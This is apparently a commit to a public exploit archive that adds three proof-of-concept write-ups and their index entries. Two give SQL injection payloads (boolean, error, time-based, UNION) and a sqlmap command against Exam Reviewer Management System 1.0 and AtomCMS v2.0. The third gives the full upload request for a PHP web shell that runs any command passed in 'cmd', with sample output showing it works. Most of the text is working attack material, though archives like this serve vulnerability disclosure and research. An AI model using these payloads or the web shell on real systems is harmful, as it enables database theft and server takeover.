DB: 2022-02-10

3 changes to exploits/shellcodes Exam Reviewer Management System 1.0 - ‘id’ SQL Injection Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated) AtomCMS v2.0 - SQLi
2022-02-10 05:02:00 +00:00 · 2022-02-10 05:02:00 +00:00 · c86e2ee727
commit c86e2ee727
parent 41553c4004
4 changed files with 271 additions and 0 deletions
--- a/exploits/php/webapps/50725.txt
+++ b/exploits/php/webapps/50725.txt
@ -0,0 +1,64 @@
+# Exploit Title: Exam Reviewer Management System 1.0 - ‘id’ SQL Injection
+# Date: 2022-02-18
+# Exploit Author:  Juli Agarwal(@agarwaljuli)
+# Vendor Homepage:
+https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html
+
+# Software Link:
+https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code
+
+# Version: 1.0
+# Tested on: Windows 10/Kali Linux
+
+
+
+Description – The ‘id’ parameter in Exam Reviewer Management System web
+application is vulnerable to SQL Injection
+
+Vulnerable URL - http://127.0.0.1/erms/?p=take_exam&id=1
+
+
+
+POC:-
+
+
+
+---
+
+Parameter: id (GET)
+
+Type: boolean-based blind
+
+Title: AND boolean-based blind - WHERE or HAVING clause
+
+Payload: p=take_exam&id=1' AND 4755=4755 AND 'VHNu'='VHNu
+
+
+
+Type: error-based
+
+Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY
+clause (FLOOR)
+
+Payload: p=take_exam&id=1' OR (SELECT 8795 FROM(SELECT
+COUNT(*),CONCAT(0x71766a7071,(SELECT
+(ELT(8795=8795,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MCXA'='MCXA
+
+
+
+Type: time-based blind
+
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+Payload: p=take_exam&id=1' AND (SELECT 2206 FROM (SELECT(SLEEP(5)))AhEo)
+AND 'vqGg'='vqGg---
+
+
+
+*SQLMAP COMMAND*
+
+
+
+*# sqlmap -u "127.0.0.1/erms/?p=take_exam&id=1
+<http://127.0.0.1/erms/?p=take_exam&id=1>" -p id --dbs --level 3*
--- a/exploits/php/webapps/50726.txt
+++ b/exploits/php/webapps/50726.txt
@ -0,0 +1,144 @@
+# Exploit Title: Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
+# Date: 2022-02-08
+# Exploit Author:  Juli Agarwal(@agarwaljuli)
+# Vendor Homepage:
+https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html
+
+# Software Link:
+https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code
+
+# Version: 1.0
+# Tested on: XAMPP, Kali Linux
+
+
+
+Description – The application suffers from a remote code execution in the
+admin panel. An authenticated attacker can upload a web-shell php file in
+profile page to achieve remote code execution.
+
+
+
+POC:-
+
+
+
+==========
+
+# Request:
+
+==========
+
+POST /erms/classes/Users.php?f=save HTTP/1.1
+
+Host: localhost
+
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
+Firefox/91.0
+
+Accept: */*
+
+Accept-Language: en-US,en;q=0.5
+
+X-Requested-With: XMLHttpRequest
+
+Content-Type: multipart/form-data;
+boundary=---------------------------37791356766765055891341961306
+
+Content-Length: 1004
+
+Origin: http://localhost
+
+Connection: close
+
+Referer: http://localhost/erms/admin/?page=user
+
+Cookie: PHPSESSID=22f0bd65ef694041af3177057e7fbd5a
+
+
+
+-----------------------------37791356766765055891341961306
+
+Content-Disposition: form-data; name="id"
+
+
+
+1
+
+-----------------------------37791356766765055891341961306
+
+Content-Disposition: form-data; name="firstname"
+
+
+
+Adminstrator
+
+-----------------------------37791356766765055891341961306
+
+Content-Disposition: form-data; name="lastname"
+
+
+
+Admin
+
+-----------------------------37791356766765055891341961306
+
+Content-Disposition: form-data; name="username"
+
+
+
+admin
+
+-----------------------------37791356766765055891341961306
+
+Content-Disposition: form-data; name="password"
+
+
+
+-----------------------------37791356766765055891341961306
+
+Content-Disposition: form-data; name="img"; filename="shell.php"
+
+Content-Type: application/x-php
+
+
+
+<html>
+
+<body>
+
+<b>Remote code execution: </b><br><pre>
+
+                              <?php if(isset($_REQUEST['cmd'])){ echo
+"<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
+
+</pre>
+
+</body>
+
+</html>
+
+
+
+-----------------------------37791356766765055891341961306—
+
+
+
+================
+
+# Webshell access:
+
+================
+
+
+
+# Webshell access via:
+
+POC: http://localhost/erms/uploads/1644334740_shell.php?cmd=id
+
+
+
+# Webshell response:
+
+Remote code execution:
+
+uid=1(daemon) gid=1(daemon) groups=1(daemon)
--- a/exploits/php/webapps/50727.txt
+++ b/exploits/php/webapps/50727.txt
@ -0,0 +1,60 @@
+# Exploit Title: AtomCMS v2.0 - SQLi
+# Date: 08/02/2022
+# Exploit Author: Luca Cuzzolin aka czz78
+# Vendor Homepage: https://github.com/thedigicraft/Atom.CMS
+# Version: v2.0
+# Category: Webapps
+# Tested on: Debian linux
+# CVE : CVE-2022-24223
+
+
+====================================================
+
+# PoC : SQLi :
+
+http://127.0.0.1/Atom.CMS/admin/login.php
+
+
+POST /Atom.CMS/admin/login.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
+Firefox/91.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: it,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 35
+Origin: http://127.0.0.1
+Connection: keep-alive
+Referer: http://127.0.0.1/Atom.CMS/admin/login.php
+Cookie: PHPSESSID=tqfebdu4kn9qj7g6qpa91j9859
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+email=test%40test.com&password=1234
+
+
+Vulnerable Payload :
+
+Parameter: email (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: email=test@test.com' AND (SELECT 5613 FROM
+(SELECT(SLEEP(5)))JnLZ) AND 'pROE'='pROE&password=1234
+    Vector: AND (SELECT [RANDNUM] FROM
+(SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 6 columns
+    Payload: email=test@test.com' UNION ALL SELECT
+NULL,CONCAT(0x717a767a71,0x65557a784e446152424b63724b5a737062464a4267746c70794d5976484c484a5365634158734975,0x71627a7871),NULL,NULL,NULL,NULL--
+-&password=1234
+    Vector:  UNION ALL SELECT NULL,[QUERY],NULL,NULL,NULL,NULL-- -
+---
+
+
+
+====================================================
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -44799,3 +44799,6 @@ id,file,description,date,author,type,platform,port
 50721,exploits/php/webapps/50721.py,"Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion",1970-01-01,Ven3xy,webapps,php,
 50723,exploits/php/webapps/50723.txt,"WordPress Plugin Security Audit 1.0.0 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php,
 50724,exploits/php/webapps/50724.txt,"WordPress Plugin CP Blocks 1.0.14 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php,
+50725,exploits/php/webapps/50725.txt,"Exam Reviewer Management System 1.0 - ‘id’ SQL Injection",1970-01-01,"Juli Agarwal",webapps,php,
+50726,exploits/php/webapps/50726.txt,"Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Juli Agarwal",webapps,php,
+50727,exploits/php/webapps/50727.txt,"AtomCMS v2.0 - SQLi",1970-01-01,"Luca Cuzzolin",webapps,php,